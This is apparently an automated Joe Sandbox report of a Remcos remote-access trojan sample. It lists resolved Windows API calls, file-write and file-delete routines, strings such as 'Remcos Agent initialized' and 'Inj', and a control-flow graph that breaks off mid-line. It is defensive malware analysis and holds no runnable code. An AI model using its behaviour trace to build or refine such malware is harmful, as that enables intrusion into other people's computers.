• API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
• String ID:
• API String ID: 1897104825-0
• Opcode ID: 01db9d51aeb5f1a5b6a6b4a0b73b57ffe9c9c5f4989692c2180b219ecd477bbc
• Instruction ID: 6f3e2ab44755813ecc43d16828ce5ca2d2a0a6f284a6ad6f1bf7f31a0a3c21d0
• Opcode Fuzzy Hash: 01db9d51aeb5f1a5b6a6b4a0b73b57ffe9c9c5f4989692c2180b219ecd477bbc
• Instruction Fuzzy Hash: A721C271A50308BAEB51EA94CC42FDEB7BDEB08700F510466B705F72C0DAB4AE458B68
Uniqueness

Uniqueness Score: -1.00%

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02DFC9EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: 7f497d1bb4a7aef04b466b3d24b9a8fa38e74d2c6fc26fc8207e6d2e5c4d1949
• Instruction ID: 2b5ecff32ba21c3e3bef03325860f23e371bc9f5bfb108f42a56ff88d8d99aa7
• Opcode Fuzzy Hash: 7f497d1bb4a7aef04b466b3d24b9a8fa38e74d2c6fc26fc8207e6d2e5c4d1949
• Instruction Fuzzy Hash: A9412B31A602489BEF10FBA4D881ADEB3FAEF48714F614466E602B7340DA70AD158F64
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02DE4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02DE4EF2
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DFC4CA), ref: 02DFC437
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DFC471
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DFC49E
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DFC4A7
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
• Opcode ID: 88a711c6774b85ba615d8b89274cb2d9368c5392f99ca1e623ba70ecd3612598
• Instruction ID: cd1037dcac29e7dd366e68bba2107bb3afe5b4bdf97be08c337fd08cc0b7d174
• Opcode Fuzzy Hash: 88a711c6774b85ba615d8b89274cb2d9368c5392f99ca1e623ba70ecd3612598
• Instruction Fuzzy Hash: 8D21C571A5020CBAEB51EB94DC42FDEB7BDEB04B10F514465B605F72D0D7B46E048A68
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02DE4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02DE4EF2
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DFC4CA), ref: 02DFC437
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DFC471
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DFC49E
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DFC4A7
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
• Opcode ID: a118cd6ca217190bc208db3de8adb759064fcf3c4de05e35e3c300d2ec75a7b6
• Instruction ID: 969e5df88cfde56012f7b75de814ed85f383d7a4f58c88aecd18d30c52ba7782
• Opcode Fuzzy Hash: a118cd6ca217190bc208db3de8adb759064fcf3c4de05e35e3c300d2ec75a7b6
• Instruction Fuzzy Hash: C021C071A5020CBAEB51EBA4DC42FDEB7BDEB04B10F614466B605F72D0D7B46E048A68
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DE4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02DE4EF2
                                                                                                                                                    • RtlInitUnicodeString.N(?,?,00000000,02DFC3E2), ref: 02DFC390
                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02DFC3E2), ref: 02DFC3A6
                                                                                                                                                    • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02DFC3E2), ref: 02DFC3C5
                                                                                                                                                      • Part of subcall function 02DE4C24: SysFreeString.OLEAUT32(02DFD42C), ref: 02DE4C32
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1694942484-0
                                                                                                                                                    • Opcode ID: 2712c4415e38be0679b27d668322fe046b9821f6791b61a094527cd8398987ed
                                                                                                                                                    • Instruction ID: 1e960bbc47e62bdafdbeda6f559eff7d7420915d43f0567e16587cb833cd9631
                                                                                                                                                    • Opcode Fuzzy Hash: 2712c4415e38be0679b27d668322fe046b9821f6791b61a094527cd8398987ed
                                                                                                                                                    • Instruction Fuzzy Hash: 9501F47595030CBADB41EBA1CD41FCEB3FDEB48700F514462E641E6290EA75AF188A7D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DF6D28: CLSIDFromProgID.OLE32(00000000,?,00000000,02DF6D75,?,?,?,00000000), ref: 02DF6D55
                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,02DF6E68,00000000,00000000,02DF6DE7,?,00000000,02DF6E57), ref: 02DF6DD3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFromInstanceProg
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2151042543-0
                                                                                                                                                    • Opcode ID: 6e32cda663268fb10a6fa52639fa7b95bcfb57517ad9caa7f2dcf50fbd08acdc
                                                                                                                                                    • Instruction ID: e9a3bf2f38b3fae5984888e7671a45dd3402e2bac97988dc7eeb635f00032cf7
                                                                                                                                                    • Opcode Fuzzy Hash: 6e32cda663268fb10a6fa52639fa7b95bcfb57517ad9caa7f2dcf50fbd08acdc
                                                                                                                                                    • Instruction Fuzzy Hash: E401D4722047046EEB45EF61EC1286F7BADDB49B10F924435FA01D2B40F670DD14C9B8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph
APIs
  • Part of subcall function 1569CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,1568E9E1), ref: 1569CB65
  • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CB6E
  • Part of subcall function 1569CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,1568E9E1), ref: 1569CB85
  • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CB88
  • Part of subcall function 1569CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,1568E9E1), ref: 1569CB9A
  • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CB9D
  • Part of subcall function 1569CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,1568E9E1), ref: 1569CBAE
  • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CBB1
  • Part of subcall function 1569CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,1568E9E1), ref: 1569CBC3
  • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CBC6
  • Part of subcall function 1569CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,1568E9E1), ref: 1569CBD2
  • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CBD5
  • Part of subcall function 1569CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,1568E9E1), ref: 1569CBE6
  • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CBE9
  • Part of subcall function 1569CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,1568E9E1), ref: 1569CBFA
  • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CBFD
  • Part of subcall function 1569CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,1568E9E1), ref: 1569CC0E
  • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CC11
  • Part of subcall function 1569CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,1568E9E1), ref: 1569CC22
  • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CC25
  • Part of subcall function 1569CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,1568E9E1), ref: 1569CC36
  • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CC39
  • Part of subcall function 1569CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,1568E9E1), ref: 1569CC4A
  • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CC4D
  • Part of subcall function 1569CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,1568E9E1), ref: 1569CC5E
  • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CC61
  • Part of subcall function 1569CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,1568E9E1), ref: 1569CC72
  • Part of subcall function 1569CB50: GetProcAddress.KERNEL32(00000000), ref: 1569CC75
  • Part of subcall function 1569CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,1568E9E1), ref: 1569CC83
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\fu56fbrtn8.exe,00000104), ref: 1568E9EE
  • Part of subcall function 15690F37: __EH_prolog.LIBCMT ref: 15690F3C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
• String ID: Access Level: $Administrator$C:\Users\user\Desktop\fu56fbrtn8.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-VLI916$Software\$User$del$del$exepath$licence$license_code.txt
• API String ID: 2830904901-2983409021
• Opcode ID: b19611d892302b43d16c517cd3a7787f7faa74f8a51f89bcb3f167d7b4bbc6c6
• Instruction ID: f61ce493132f212180021967d5080d1bbf12e68b231c5eed59cfc26ad6b3be26
• Opcode Fuzzy Hash: b19611d892302b43d16c517cd3a7787f7faa74f8a51f89bcb3f167d7b4bbc6c6
• Instruction Fuzzy Hash: 0B32E778F06345AFDA18AB709C79B6E26DA5F91640F84041DE6436B3C0EE79BD01C3E9
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
call 2de4964 call 2de4698 call 2df7be8 call 2de4964 call 2de4698 call 2df9e70 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de3694 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 7208->7355 7209->7208 7227 2e03c64-2e04465 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 WinExec call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 
2de47b0 call 2de4964 call 2de4698 call 2df7be8 7209->7227 8003 2e0446a-2e044d5 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 7227->8003 7533 2e06b54-2e06cd7 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de48b0 7354->7533 7534 2e06395-2e06711 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de2ee0 call 2de2f08 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 7354->7534 8002 2e05c0b-2e05cb3 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 7355->8002 7712 2e074a8-2e08b96 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 
2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 * 16 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 
2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 ExitProcess 7533->7712 7713 2e06cdd-2e06cec call 2de48b0 7533->7713 7999 2e06716-2e06781 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 7534->7999 7713->7712 7728 2e06cf2-2e06fc5 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfd198 call 2de4824 call 2de4964 call 2de4698 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de7e18 7713->7728 8133 2e072a2-2e074a3 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 
call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de49bc call 2df7f48 7728->8133 8134 2e06fcb-2e0729d call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfc74c call 2de44f4 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4da4 * 2 call 2de4728 call 2dfc3f8 7728->8134 8059 2e06786-2e0678d call 2df7be8 7999->8059 8099 2e05cb5-2e05cb8 8002->8099 8100 2e05cba-2e05f7c call 2df5aa8 call 2de4b90 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de49bc RtlMoveMemory call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfa1c0 8002->8100 8062 2e044da-2e044e1 call 2df7be8 8003->8062 8069 2e06792-2e067fd call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8059->8069 8072 2e044e6-2e04551 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8062->8072 8129 2e06802-2e06823 call 2df7be8 GetCurrentProcess call 2df7968 8069->8129 8132 2e04556-2e0455d call 2df7be8 8072->8132 8099->8100 8638 2e05f81-2e05f98 call 2de36c4 8100->8638 8152 2e06828-2e06898 call 2de4824 
call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8129->8152 8144 2e04562-2e04571 call 2de48b0 8132->8144 8133->7712 8134->8133 8162 2e047d5-2e04840 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8144->8162 8163 2e04577-2e045e2 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8144->8163 8233 2e0689d-2e068a4 call 2df7be8 8152->8233 8248 2e04845-2e0484c call 2df7be8 8162->8248 8245 2e045e7-2e045ee call 2df7be8 8163->8245 8247 2e068a9-2e06914 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8233->8247 8259 2e045f3-2e0465e call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8245->8259 8331 2e06919-2e06920 call 2df7be8 8247->8331 8262 2e04851-2e048bc call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8248->8262 8343 2e04663-2e0466a call 2df7be8 8259->8343 8346 2e048c1-2e048c8 call 2df7be8 8262->8346 8345 2e06925-2e06990 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8331->8345 8357 2e0466f-2e046da call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8343->8357 8428 2e06995-2e0699c call 2df7be8 8345->8428 8360 2e048cd-2e04938 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8346->8360 8441 2e046df-2e046e6 call 2df7be8 8357->8441 8444 2e0493d-2e04944 call 2df7be8 8360->8444 8443 2e069a1-2e069b4 8428->8443 8456 2e046eb-2e04756 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8441->8456 8450 2e069b6-2e069b9 8443->8450 8451 2e069bb-2e06a3e call 2de49bc call 2dfc5bc call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8443->8451 8459 2e04949-2e049b4 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8444->8459 8450->8451 8561 2e06a43-2e06a4a call 2df7be8 8451->8561 8539 2e0475b-2e04762 call 2df7be8 8456->8539 8542 2e049b9-2e049c0 call 2df7be8 8459->8542 8553 
2e04767-2e047c4 call 2de4824 call 2de4964 call 2de4d38 call 2de4da4 call 2de4728 8539->8553 8556 2e049c5-2e04a30 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8542->8556 8616 2e047c9-2e047d0 call 2dfc3f8 8553->8616 8626 2e04a35-2e04a3c call 2df7be8 8556->8626 8573 2e06a4f-2e06aba call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8561->8573 8641 2e06abf-2e06ac6 call 2df7be8 8573->8641 8616->8162 8636 2e04a41-2e04aac call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8626->8636 8682 2e04ab1-2e04ab8 call 2df7be8 8636->8682 8651 2e06acb-2e06b36 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8641->8651 8690 2e06b3b-2e06b4f call 2df7be8 EnumSystemLocalesA 8651->8690 8688 2e04abd-2e04b28 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8682->8688 8715 2e04b2d-2e04b34 call 2df7be8 8688->8715 8690->7533 8719 2e04b39-2e04bc3 call 2de3694 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8715->8719 8747 2e04bc8-2e04bcf call 2df7be8 8719->8747 8751 2e04bd4-2e04cbc call 2de4824 call 2de2f08 call 2de794c call 2de47b0 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8747->8751 8800 2e04cc1-2e04cc8 call 2df7be8 8751->8800 8804 2e04ccd-2e04d38 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 8800->8804 8828 2e04d3d-2e04d44 call 2df7be8 8804->8828 8832 2e04d49-2e04df0 call 2de2f08 call 2de794c call 2de47b0 call 2de4824 call 